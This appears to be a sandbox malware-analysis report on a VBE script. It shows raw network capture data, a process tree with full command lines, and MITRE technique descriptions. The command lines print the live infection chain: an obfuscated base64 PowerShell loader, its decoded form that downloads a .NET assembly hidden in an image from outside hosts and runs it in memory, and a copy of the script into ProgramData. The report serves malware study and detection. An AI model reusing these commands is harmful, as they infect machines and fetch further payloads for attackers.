t&x>`0}A(AP\NOsLvKLQ@i(z:SJmSO&FsQ;Tg2bf#&2lr=o4z61h4cLz0pi?C@ASRPRQ@NM%PK'<C)Rq@ Ru)fDvTC7KQZKesc&F>one
2024-02-13 20:13:54 UTC	1369	IN	Data Raw: 3e 94 d3 1e 73 e9 59 f2 95 cd a6 84 06 20 dd f8 ab 1a 7d c5 ad a3 ce 6e 6c c5 e0 78 99 50 16 c6 c7 ec c3 e9 e9 4c fb a6 a2 6e fc 71 52 e3 7d 0a 8c fb 95 59 0a e3 27 24 67 9f 6c f4 fc 29 09 dc 0f 3c 54 ae be b5 11 e3 e9 43 89 5c c4 64 1c 54 4c 4e 7d fd aa 7e 49 03 af f2 a6 32 64 e4 71 df 1d 0d 67 cb 62 ae 44 ec 64 cb 1e 4f 1f 87 61 51 b8 c9 03 03 03 8c fa fe 95 af a2 59 e9 57 97 12 c7 ab de cf 61 07 94 4c 72 43 0f 9b 96 03 20 11 91 d4 f7 1f 8d 64 90 4e 33 d4 fb e6 96 fa 58 3a 27 71 98 23 34 d6 e7 f0 a9 48 e6 98 47 07 d6 97 2d f5 05 2b 11 18 9b 1b f1 f2 8e fd b9 f4 a7 45 75 3d ba 4f 1c 52 c9 1c 73 28 49 55 18 81 20 c8 60 08 cf 62 a0 e3 da 9c 77 79 7b 4b 1c 75 c7 6a 41 19 72 06 ec 13 c6 71 ef 59 b5 dc d6 32 b1 58 a8 07 39 cf e1 8a 42 39 ab 37 11 04 90 85 7d Data Ascii: >sY }nlxPLnqR}Y'$gl)<TC\dTLN}~I2dqgbDdOaQYWaLrC dN3X:'q#4HG-+Eu=ORs(IU `bwy{KujArqY2X9B97}
2024-02-13 20:13:54 UTC	1369	IN	Data Raw: 1c d4 15 af 69 e1 8d 6f 55 d1 ef 35 5b 4d 26 fe ef 4a b1 4d d7 37 b1 5b bb c3 00 c8 19 77 00 85 e4 81 92 47 5a c7 62 01 3d ea 53 12 ba dd 06 05 35 93 34 b9 34 31 20 0a 63 63 0e 7b d2 1c f6 a7 9e 94 d2 31 c8 e6 82 2c 46 d4 da 71 5e 49 f5 a6 d3 6a c6 97 10 8a 6e 39 cd 3e 82 b9 e9 52 2d 44 dd d3 d2 95 79 e4 f4 a3 67 bd 38 2f 1c 9a 42 b7 50 18 26 9b 9c 11 e9 4f a4 20 1f ad 22 6e 35 fd 47 43 4d a9 31 81 eb 4d c0 eb de 90 c6 91 8a 5c f1 47 5f 6a 4a 56 13 0f c6 91 85 2d 07 9a a1 0c a4 e0 1a 7e 38 a4 29 4c 62 66 93 22 8c 60 1a 6d 21 8a 06 69 d4 8b 8c d3 8f 26 9d ae 26 46 c4 12 2a 32 31 f4 a7 9e a6 9a 46 69 1a 21 b4 e1 d2 9b d2 95 68 b0 c5 c0 a5 a2 8a 57 10 51 40 19 a3 06 98 08 46 45 20 e2 9d 4d 2a 73 c0 e2 93 57 01 43 98 f0 ca 79 f5 a1 55 ee a4 24 f2 79 3c 9a 6b Data Ascii: ioU5[M&JM7[wGZb=S5441 cc{1,Fq^Ijn9>R-Dyg8/BP&O "n5GCM1M\G_jJV-~8)Lbf"`m!i&&F21Fi!hWQ@FE MsWCyU$y<k
2024-02-13 20:13:54 UTC	1369	IN	Data Raw: 98 31 c8 03 27 38 ef 83 8a 87 38 5e 9f 37 ad 0c 41 01 71 83 eb 48 03 94 f9 7e f2 83 9c 76 34 ce 9e e7 d4 f7 a7 e4 91 d3 81 4d e4 9a 00 50 c7 69 18 07 3c d2 d3 48 c1 e9 8a 4a 60 14 ac 39 f5 1d 69 2a 7b 79 a1 88 c8 66 b7 17 20 a1 55 05 b6 ed 3d 01 e9 ce 3d 0d 20 2b 36 01 3f 97 f2 e2 95 d3 68 1c 83 9e 78 39 e2 93 90 3a e4 f4 e4 63 38 f6 f7 a3 df 02 a8 61 8c 9c 01 9f c2 97 1c fa 52 2b 94 60 c0 e0 8a 7c 8a 11 b3 bb 70 6e 4f b1 a0 69 dc 65 25 1d 68 eb 42 10 30 c0 fc 85 03 a5 48 11 1a 12 de 61 12 e7 01 70 70 47 ae 7a 54 63 8a 05 b1 25 b4 6f 34 f1 c2 9b 43 cc c1 01 73 b4 02 4f 73 d0 63 b9 35 36 a7 a7 be 8f a9 5e d8 5c 98 e5 9e da 47 81 9e 07 de 85 83 60 95 6e 84 1c 13 91 55 18 02 08 c6 41 1d 3b 7b f6 a4 c7 40 09 03 d4 ff 00 85 48 05 2b a1 45 56 e0 e7 b0 e4 fa 72 Data Ascii: 1'88^7AqH~v4MPi<HJ`9i*{yf U== +6?hx9:c8aR+`\|pnOie%hB0HappGzTc%o4CsOsc56^\G`nUA;{@H+EVr
2024-02-13 20:13:54 UTC	1369	IN	Data Raw: 18 1e f5 4b 70 6a e2 83 8e e3 f3 a0 b0 ff 00 eb f6 a6 10 00 a9 9e 55 78 76 84 e0 7a 7f 5a 2c 2b 11 b8 ef 8c 7d 69 94 a4 9e 99 cd 25 0b 41 86 06 d3 eb 4a 47 71 d2 92 81 9e 79 a6 0d d8 fd 3f 27 23 af e5 4d dc 3d 79 a6 ee da 28 c8 3c 7f 5a fd 54 fc c0 52 41 3f d6 9a cd cf 14 3f 4c 0e 95 19 c8 a0 64 aa c0 8a 1a a2 59 01 c0 e9 cd 38 9c 9a 96 52 06 27 a7 43 51 96 39 f4 a7 13 c6 3b fa d4 79 e7 d4 fb 55 14 3b 27 14 9d 4d 29 6a 6e 7a d4 dc 60 cd 9e 07 d2 9b 4a 48 22 9a 4e de b4 ee c6 0c 7d e9 9b cd 0e db 87 14 d3 c7 d6 8d f5 01 c5 89 a6 e7 9a 32 7f 1a 6e 69 8f 71 dd 7b 67 14 d2 c0 03 c7 b5 21 6e 7a f2 69 a4 d4 ee 3b 0a c4 1c 71 82 3b d3 77 0a 4d d4 83 19 eb 4f 41 b1 c5 f0 38 18 3e f4 dd f9 ed f9 50 dc 03 de 9b cf a5 48 58 7b 30 e3 1d 69 84 f7 c6 4d 1d e9 ac 79 a2 Data Ascii: KpjUxvzZ,+}i%AJGqy?'#M=y(<ZTRA??LdY8R'CQ9;yU;'M)jnz`JH"N}2niq{g!nzi;q;wMOA8>PHX{0iMy
2024-02-13 20:13:54 UTC	1369	IN	Data Raw: 4f b9 a0 f0 7a 53 1c 77 eb 4a dd 4d 2e 44 45 37 6e 78 03 27 ad 48 41 27 a8 a3 26 3c 15 1c ff 00 3a 42 4c 8c 85 f2 0e 50 97 27 86 e4 0a 60 1c 9f 41 fe 7f 4a b9 2d f1 96 d1 61 28 06 09 39 ee 6a a0 3c 1f cf e9 48 ad c4 00 b6 00 19 3d 3d 73 48 c4 90 46 30 7a 54 d6 f2 08 5c 31 19 e7 38 fc 29 92 c9 e6 39 38 c6 79 fe 75 22 5b 11 03 8a 61 39 3c 8c 0a 97 23 69 f5 a8 c8 a2 d7 1a 18 c3 06 92 94 f2 71 e9 49 cf a5 05 ad 03 3d e8 0d ef ed ed 9f 4c d3 a0 88 4d 3c 51 17 58 83 ba ae f7 e0 2e 4f 24 9f 41 9e 6a e6 bb a5 26 8b a9 cb 69 1d fd b6 a4 88 01 fb 4d 99 cc 6d 91 c8 07 db a1 c5 4f 5b 15 7d 2e 55 56 07 d0 1a 31 92 73 f4 a8 b1 f9 55 80 50 5b 9e 3e 7c e6 80 4f b9 1e de 69 ac 36 d2 6e 3b a8 63 91 4a c3 43 93 c9 00 6e 2c 5b 18 f6 14 d6 c7 f0 d3 29 56 a6 d6 2c 69 53 ef 52 Data Ascii: OzSwJM.DE7nx'HA'&<:BLP'`AJ-a(9j<H==sHF0zT\18)98yu"[a9<#iqI=LM<QX.O$Aj&iMmO[}.UV1sUP[>\|Oi6n;cJCn,[)V,iSR

Target ID:	0
Start time:	21:13:48
Start date:	13/02/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\dereac.vbe"
Imagebase:	0x7ff60f410000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:13:50
Start date:	13/02/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreGMDgTrebgB2DgTreGgDgTreLwBLDgTreEoDgTreLwBtDgTreG8DgTreYwDgTreuDgTreHMDgTrecgBlDgTreGQDgTrebgBvDgTreHcDgTrecwByDgTreGUDgTreZDgTreBuDgTreGkDgTredwDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBODgTreGEDgTrebQBlDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:13:50
Start date:	13/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	21:13:51
Start date:	13/02/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	21:13:58
Start date:	13/02/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	21:13:58
Start date:	13/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	21:14:08
Start date:	13/02/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\ProgramData\Name.vbs"
Imagebase:	0x7ff60f410000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	21:14:16
Start date:	13/02/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\ProgramData\Name.vbs"
Imagebase:	0x7ff60f410000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Function 00007FFD348937B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2714047990.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: bf533fd274c58afd781b72c11c81cc6882029034b975418c297449fcca739756
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 5D01677121CB0D4FD744EF4CE451AA6B7E0FB99364F10056DE58AC3651D736E882CB45

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 6392, Parent PID: 3564COMMON

Executed Functions

Function 00007FFD348B33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184447465.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: deb5d86c88e8f26112380754d293aded1f7c495d532cba5f2c16f698bcc23440
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: E201A73020CB0C4FD744EF0CE051AA6B3E0FB89320F10052DE58AC3651DA36E882CB41

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

